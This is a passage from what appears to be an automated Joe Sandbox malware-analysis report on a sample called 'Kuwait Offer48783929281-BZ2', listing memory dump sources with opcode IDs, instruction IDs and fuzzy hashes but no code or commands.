                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fe6c1fb5b48584a719777f8947616d27e84dcb0a44e3c80a5a304abde448922
                                          • Instruction ID: 366c24fcb1c856db8acc4727a545a4a896534171b791786951fa602724c69b83
                                          • Opcode Fuzzy Hash: 4fe6c1fb5b48584a719777f8947616d27e84dcb0a44e3c80a5a304abde448922
                                          • Instruction Fuzzy Hash: 73912630B002648FDB44DF69C894AAA7BF6BF89710B1440A9E506DF3B1DB71EC41CBA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cb0925063329f1529ef052c14a17929b0704823b1392e1bca2be1240d3ba853
                                          • Instruction ID: 90cbf9d1a63c625d135df7d16705daf5929c88bd7319529108c044b775d374f1
                                          • Opcode Fuzzy Hash: 4cb0925063329f1529ef052c14a17929b0704823b1392e1bca2be1240d3ba853
                                          • Instruction Fuzzy Hash: 7BA10C34A002288FDB54DF68C994B9DBBB6BF89300F5095A8E54AAB355DF30ED85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c9a1fc90816fa19e225d8226d714511de07194610debf7d06ebe44372783b12b
                                          • Instruction ID: 89015d9536800d9fc807c84e82989c71592f249c90445a5a8fb7f637fde09fac
                                          • Opcode Fuzzy Hash: c9a1fc90816fa19e225d8226d714511de07194610debf7d06ebe44372783b12b
                                          • Instruction Fuzzy Hash: DBA12D34A10218DFCB44EFA4D894A9DBBB6FF89300F158169E506AB365DB70EC46CB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e1d466ba546b030662c0b46b14b52ee9eb4974b63ffff7146035261bbfeea8b
                                          • Instruction ID: 4cf63e2198f9ec77892b4d06b5ef1f992d50a4ccdb6e7d7105d86a1b337b443e
                                          • Opcode Fuzzy Hash: 7e1d466ba546b030662c0b46b14b52ee9eb4974b63ffff7146035261bbfeea8b
                                          • Instruction Fuzzy Hash: 13817735B112048FDB55CF65E454AAEBBF6EF88311F258069EA12AB290CB35CD45CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4ae05a415c00ef73f20945587bfd81522ed113f7a0f8cee1dea3986d792e07c
                                          • Instruction ID: 540f534b24f8d79c62d3e6927a5f8699ee326d6b266f6818d11e5d94672b0ebb
                                          • Opcode Fuzzy Hash: a4ae05a415c00ef73f20945587bfd81522ed113f7a0f8cee1dea3986d792e07c
                                          • Instruction Fuzzy Hash: 7A814935A01628CFCB54DFA8C584A9EB7F5FF88350B1581A9E856DB360DB30ED42CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42d69a93f7e34b3f97d235a77f722a25f808bc82ad6975ac2addf7851c50e3ce
                                          • Instruction ID: 32a1995c7f496d01b1c61d03fe5ef8cf02eeb8fb79249ed9fe721cdf3ab6e417
                                          • Opcode Fuzzy Hash: 42d69a93f7e34b3f97d235a77f722a25f808bc82ad6975ac2addf7851c50e3ce
                                          • Instruction Fuzzy Hash: FC71ED317042168FEB59DF68D8646AE7BA7EF85700B108169E8068B392CF35DC56C7D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8264f15c38821769c8cb5edca0a6bf1bad88aa022d7d1fe65d395e9ca8ce277c
                                          • Instruction ID: ce91b88a6e02f9bb7ee538d648bdf39f29e85ae4fffd35a1504dd75c1a89d893
                                          • Opcode Fuzzy Hash: 8264f15c38821769c8cb5edca0a6bf1bad88aa022d7d1fe65d395e9ca8ce277c
                                          • Instruction Fuzzy Hash: 5F51CD34B003118FC7AAAF78C86466EBBB7AF86310B14446DD5468B3A5DF35DC06CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f10249ed173b2e191b2b43d00890346bcf44dae5061fa7db2fefdaaafa844b2a
                                          • Instruction ID: 33b022db666a26afd25cef364afd379ba8635aa57113bac9b74d5546456054d8
                                          • Opcode Fuzzy Hash: f10249ed173b2e191b2b43d00890346bcf44dae5061fa7db2fefdaaafa844b2a
                                          • Instruction Fuzzy Hash: 86612C35B106149FCB54DF68D894AADBBB6FF89710F108169F516AB3A5CB30EC41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e9215cbb593383ed964e35b65278312b949a9be7642f9b1fa97f4dafc989aa1
                                          • Instruction ID: 066ec5f2c9b714fbaa0bd3bc1e150822935153fd4af1a2a40675889a30cc488a
                                          • Opcode Fuzzy Hash: 4e9215cbb593383ed964e35b65278312b949a9be7642f9b1fa97f4dafc989aa1
                                          • Instruction Fuzzy Hash: F6510431A10616CFCB10CF68D480A6AFBF5FF8A320B168695E955DB281DB30ED56CBD4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9de6583dff02fc3ca074f705ac0393aa183ce272b8d26d40490e2b92f7f2edd8
                                          • Instruction ID: 527d1afd3a3d1cde3bc8cc73873c1a557d2bc7460c09edb95d18912531dde3b4
                                          • Opcode Fuzzy Hash: 9de6583dff02fc3ca074f705ac0393aa183ce272b8d26d40490e2b92f7f2edd8
                                          • Instruction Fuzzy Hash: 5051F935B106149FCB44DF68C894AADBBB6FF89710F148169F516AB3A5DB30EC41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86c0c8a6ae2fcc1197732ce012e2d0870097de2e3d86fce0bb147d56383b62a2
                                          • Instruction ID: fcdba315c303c5fc681e32fd80a098747f7e752b87850361affbc24233550bec
                                          • Opcode Fuzzy Hash: 86c0c8a6ae2fcc1197732ce012e2d0870097de2e3d86fce0bb147d56383b62a2
                                          • Instruction Fuzzy Hash: 54518C357012148FDB14DB69D890A6EBBE6FF89710B15806AEA05DB366DB31EC01CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8fb25c2ded4d48d14baa6ee2633737c60bfa56ff2d01a5f6c16ac142797a7b6f
                                          • Instruction ID: 507c67e1f21940e88491dd81301deece12031d9aa1697fa305f52a2b8f8e7ae3
                                          • Opcode Fuzzy Hash: 8fb25c2ded4d48d14baa6ee2633737c60bfa56ff2d01a5f6c16ac142797a7b6f
                                          • Instruction Fuzzy Hash: 46514F76600100EFCB459FA9C814D69BBB7FF8D31471680D8E60A9B272DA36DC21EB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8505c6e0f44c505e9dbe9dbf8de52e9f1fed4e75349d3dd746a2b6fd94d2a64
                                          • Instruction ID: 54d14fad83cf887b3fb19c1b84973a64d7542dc52d961395e35f615e1c22118c
                                          • Opcode Fuzzy Hash: f8505c6e0f44c505e9dbe9dbf8de52e9f1fed4e75349d3dd746a2b6fd94d2a64
                                          • Instruction Fuzzy Hash: 71515134B10619DFCB04DF64E498AAD7BBAFF89711F004119E6029B3A4DF74A946CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b5a33bee913152af24a422dd1b1d2bcdde9ca026496852a0ed508041937304a
                                          • Instruction ID: cf5addd3bab851cac06094b2c5052820ba9260e39654a7be5417581110b0a9ae
                                          • Opcode Fuzzy Hash: 2b5a33bee913152af24a422dd1b1d2bcdde9ca026496852a0ed508041937304a
                                          • Instruction Fuzzy Hash: 22419470B106288FCB94EB68C854AAE7BBAAFC9700F10441DE5129B394CF749C068B95
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b84522b4390dd2be7c40e85199b19ed66e850739f68ae31a53805012184a287
                                          • Instruction ID: 3b9d94dede33972fe4b9c1ca64f0583e4cf57c46aad95a5945390ccb2ae77776
                                          • Opcode Fuzzy Hash: 9b84522b4390dd2be7c40e85199b19ed66e850739f68ae31a53805012184a287
                                          • Instruction Fuzzy Hash: A941B6717002049FCF45CFA5D894E9ABFB6EF89310B158069E7069B361DA31EC16CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74f441960d5464a4ce905fda5db175a0cca8457fac1d58d42808d7ff136a9a3f
                                          • Instruction ID: 93cb1a5147b2abb7c64b9a741ba62df64700b901788cd6338b8b15a8d1857c87
                                          • Opcode Fuzzy Hash: 74f441960d5464a4ce905fda5db175a0cca8457fac1d58d42808d7ff136a9a3f
                                          • Instruction Fuzzy Hash: 6341A931F01B648BCBA4DB78D55469BBBF2EF84610F04886ED55ACBA80DB30E941CB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b83428b6b1b0894d5133289be9e9c65bc3065e099c75fa21e54c754764b923c7
                                          • Instruction ID: 13193d9e9a2823773cb90f087d7ce7d72e3d6670018d448bc9d857c0905c184a
                                          • Opcode Fuzzy Hash: b83428b6b1b0894d5133289be9e9c65bc3065e099c75fa21e54c754764b923c7
                                          • Instruction Fuzzy Hash: E5419931E00795AFCB61CF69C944A6ABBF2BF88300F18895DE58697A52D730E905CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17a7f13e6043eec0ff61849fbee96ebd6b1155da8bee97d4348e4830a7a8d952
                                          • Instruction ID: 18332195c65a67f80610fa3d162bd58debf4ad4e6c291b4ae300fc4f2c081923
                                          • Opcode Fuzzy Hash: 17a7f13e6043eec0ff61849fbee96ebd6b1155da8bee97d4348e4830a7a8d952
                                          • Instruction Fuzzy Hash: 63414474D05208DFDB40CFA8D894AAEFBF5FF49300F1095AAD846A7250D3795A44CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92c50042ead9872b41a280c14bca5681059a2addadaff5ac1d69f3248ad2eb9f
                                          • Instruction ID: b5652ed9ac2d089364c3171e62955665cda6dd1446424a5f4d70e455f7ee9dab
                                          • Opcode Fuzzy Hash: 92c50042ead9872b41a280c14bca5681059a2addadaff5ac1d69f3248ad2eb9f
                                          • Instruction Fuzzy Hash: 4A41CE30A00215CFCB50DF65C850AAEBBF5FF84350F02816AE945E72A1E734D949CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24daaa70b4d1ca91c1518177e25ca8a1c809211aeb28b84e5aaa8be62246b927
                                          • Instruction ID: 2335adad7bda4b0d289a3789832da53f08af72c8f2a1ef2a40ce47a806095c58
                                          • Opcode Fuzzy Hash: 24daaa70b4d1ca91c1518177e25ca8a1c809211aeb28b84e5aaa8be62246b927
                                          • Instruction Fuzzy Hash: C6416574E05208CFDB84CFA9D844AEEBBF5FF8A300F0586AAD814A7250D7745948DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0403bc9e31c8b6fca18c08d2e744fb2cd680f84bf2dded64967acd13ddff9b4b
                                          • Instruction ID: dbc59e00e37460a654f6fdf5ad7991cfadcffe795e608a72493854125d766b73
                                          • Opcode Fuzzy Hash: 0403bc9e31c8b6fca18c08d2e744fb2cd680f84bf2dded64967acd13ddff9b4b
                                          • Instruction Fuzzy Hash: CD31F53AA10114DFCB45CF99D888E99BBB2FF49320F0640A8E6099B372C735EC55DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a8e5c1267352130e33a5126a1ff920d506848ca417cecacf166fc98c14ae182
                                          • Instruction ID: a9515835d2e717085bed51a7a4dd5a770bc425d1115555f5a0462dbd1eba3061
                                          • Opcode Fuzzy Hash: 8a8e5c1267352130e33a5126a1ff920d506848ca417cecacf166fc98c14ae182
                                          • Instruction Fuzzy Hash: 1C41F834A112288FEBA5DF64CCA0F99B7B1BF49710F1141D9EA05AB3E1C631AD85CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 617d9ea61bb42f8483c348da2819c505675aab5fd96337ad0dbd29767d19c774
                                          • Instruction ID: b42e5c48cb35f8672e62979fcc5138d11ff2f8600f4b62b06c11dcdb6cad8481
                                          • Opcode Fuzzy Hash: 617d9ea61bb42f8483c348da2819c505675aab5fd96337ad0dbd29767d19c774
                                          • Instruction Fuzzy Hash: BF313235A00219DFDB54DFA5D854AEEBBB5FF88311F108069E812B7354CB359D15CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ccc139b44d34f5e792a0ea4d9146cbfa9113373aba69fca5f6f021775e304c0
                                          • Instruction ID: f104231a833ed2e3840c8e0cc197f6eb0a9ac94b11270c235d37de00d1b564dc
                                          • Opcode Fuzzy Hash: 3ccc139b44d34f5e792a0ea4d9146cbfa9113373aba69fca5f6f021775e304c0
                                          • Instruction Fuzzy Hash: 02313A70805248DFDB51EFA8D14879DBFF5EF86309F1084AEC005A7656EB784989DF06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1099b52743bfcbe17afaa474c16882184f408418130d87c4be57b2c9a6b22479
                                          • Instruction ID: b3ffacf80cced5c7c660e2b116476b7d5dc937236801376106b75b33ed657a64
                                          • Opcode Fuzzy Hash: 1099b52743bfcbe17afaa474c16882184f408418130d87c4be57b2c9a6b22479
                                          • Instruction Fuzzy Hash: 833181713042549FCB42DF2ACCA4AAA7BF9EF8A311B1940A2F955CB371CA31DD51CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d5a7fa123bef2d9f02bfddd0d313e7cc5662c857bef9f59c08a65c2b60dafe3
                                          • Instruction ID: 245ef4a0fa6fc5094e476aa23e3f12506f9e949b67cbcb1fea7f0b42e1b738a9
                                          • Opcode Fuzzy Hash: 6d5a7fa123bef2d9f02bfddd0d313e7cc5662c857bef9f59c08a65c2b60dafe3
                                          • Instruction Fuzzy Hash: 9821D6327056109FD7648B69E844A96BBE9EFC1321B15847FF10DCB252DB31EC46C791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b51214bfb4df534394fee5051d757b8aeeb03f43d72d895ba5139a16d619ba6
                                          • Instruction ID: 992ebe3897f8ccd776a8d50808a539d8449cadec99f9740f9f60cadebf741e60
                                          • Opcode Fuzzy Hash: 9b51214bfb4df534394fee5051d757b8aeeb03f43d72d895ba5139a16d619ba6
                                          • Instruction Fuzzy Hash: C431B674A057598FC741EB64C8908AEBFB5EF8A300B0002AFD545D7361EB349E0ACBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88e8625e9465081ec92f05bff58be9abd5dd68c0c76b801156dec48f485d3862
                                          • Instruction ID: 2e667f5e68ef135ac6b031f6ba672149dd7524901ab8491a0794268625027634
                                          • Opcode Fuzzy Hash: 88e8625e9465081ec92f05bff58be9abd5dd68c0c76b801156dec48f485d3862
                                          • Instruction Fuzzy Hash: F8310375E00209CFDB44CFA9D454AAEFBF6EF89300F14D46AC906B7254D73959468FA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9aba4f55abde11b6b45e2d3739a5f480c03e062b1514fce84fd465553ebe9be7
                                          • Instruction ID: 11f4d82c4729d733040096b6a07c52fecf4d4bd5d5d91c2faadc8ff15b0da542
                                          • Opcode Fuzzy Hash: 9aba4f55abde11b6b45e2d3739a5f480c03e062b1514fce84fd465553ebe9be7
                                          • Instruction Fuzzy Hash: 1D31E435A04208EFCB158FA8C4549DD7FF6EF8D320F15551AE951A7391CB309941CBD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b052b957f1ac88e3f2d77791abb3a46a6b4b9297c3ead7a97368696e50a62802
                                          • Instruction ID: 619a8b40102f015144f5d2bfe0985662d707708aaf18d90fb27495cecfd74e23
                                          • Opcode Fuzzy Hash: b052b957f1ac88e3f2d77791abb3a46a6b4b9297c3ead7a97368696e50a62802
                                          • Instruction Fuzzy Hash: 4331E472A0424CEFCB15DFA4C88089EFBF9EF4A300F10446AE585D7251DA30E905CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51392a680af84e34da2ae83c299a0128550cc6f8b7c87e7b24b93497aa7c95f1
                                          • Instruction ID: 712b8bb20a1762c60610eb08d0c961333f42c28823ec6b2c7023fe15f0ab7e30
                                          • Opcode Fuzzy Hash: 51392a680af84e34da2ae83c299a0128550cc6f8b7c87e7b24b93497aa7c95f1
                                          • Instruction Fuzzy Hash: 38311F74E00209CFDB44CFA9D844AEEBBB6FF89310F02926AD824B7250D7749944DF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2873b16de3ae6af2fe3a7fffc57a854f4ba593de94a3b33ada1acb1876d158a9
                                          • Instruction ID: 19bd9b4b560670c9588af28f5627b29ed6896ecfa86f7d451686f460168b4f3b
                                          • Opcode Fuzzy Hash: 2873b16de3ae6af2fe3a7fffc57a854f4ba593de94a3b33ada1acb1876d158a9
                                          • Instruction Fuzzy Hash: C0313575E00218DFCB05DFA9D854AEEBBB6FF88310F10802AE816A3364DB305941DFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1dedd34700f8924f4f43c3cd2034efa2ba01fad4c8ea9cf9a2fd6ac917af91e4
                                          • Instruction ID: 3dd15af2995617db6f096f38e3a62a2d63e0c22ebc587215edc768e42324c1d1
                                          • Opcode Fuzzy Hash: 1dedd34700f8924f4f43c3cd2034efa2ba01fad4c8ea9cf9a2fd6ac917af91e4
                                          • Instruction Fuzzy Hash: 0631D274E00209DFDB44DFAAD454AAEFBFAEF89300F10D46AC916B7244D73959528F90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95a576a6216010c1ddbf31ec8f208fb18c4f5ce0f79bff1444cd9bcf5cea631b
                                          • Instruction ID: cde9e6fbe22d9ac7e8f84642227418adc842bd318aa56f33a9047fc7a47a0753
                                          • Opcode Fuzzy Hash: 95a576a6216010c1ddbf31ec8f208fb18c4f5ce0f79bff1444cd9bcf5cea631b
                                          • Instruction Fuzzy Hash: B1317A31200215DFDB54CF66D884AAEBBE6FF88304F148569F9058B3A1CB75DC91CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f36db2a288ee9db712f060b623e483a6c84d5e67edd42552748a8d94746b91c
                                          • Instruction ID: c1bc403062c35559adcd692dd208e6a12c9804bb4a78fbae182e37ae5039a3bb
                                          • Opcode Fuzzy Hash: 3f36db2a288ee9db712f060b623e483a6c84d5e67edd42552748a8d94746b91c
                                          • Instruction Fuzzy Hash: F931F270E15218CFEBA4CF58D468FA9B7B6FB49304F1184A9D80AA3251C7759885CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb84929f0cdfe00c64700b856a658f8f38a1ea783a28eeae2fe0debb9bca1486
                                          • Instruction ID: 88d842363f795ac661cd06b29fda5c7294c4958d044fa9d198c2ee85ec865fda
                                          • Opcode Fuzzy Hash: bb84929f0cdfe00c64700b856a658f8f38a1ea783a28eeae2fe0debb9bca1486
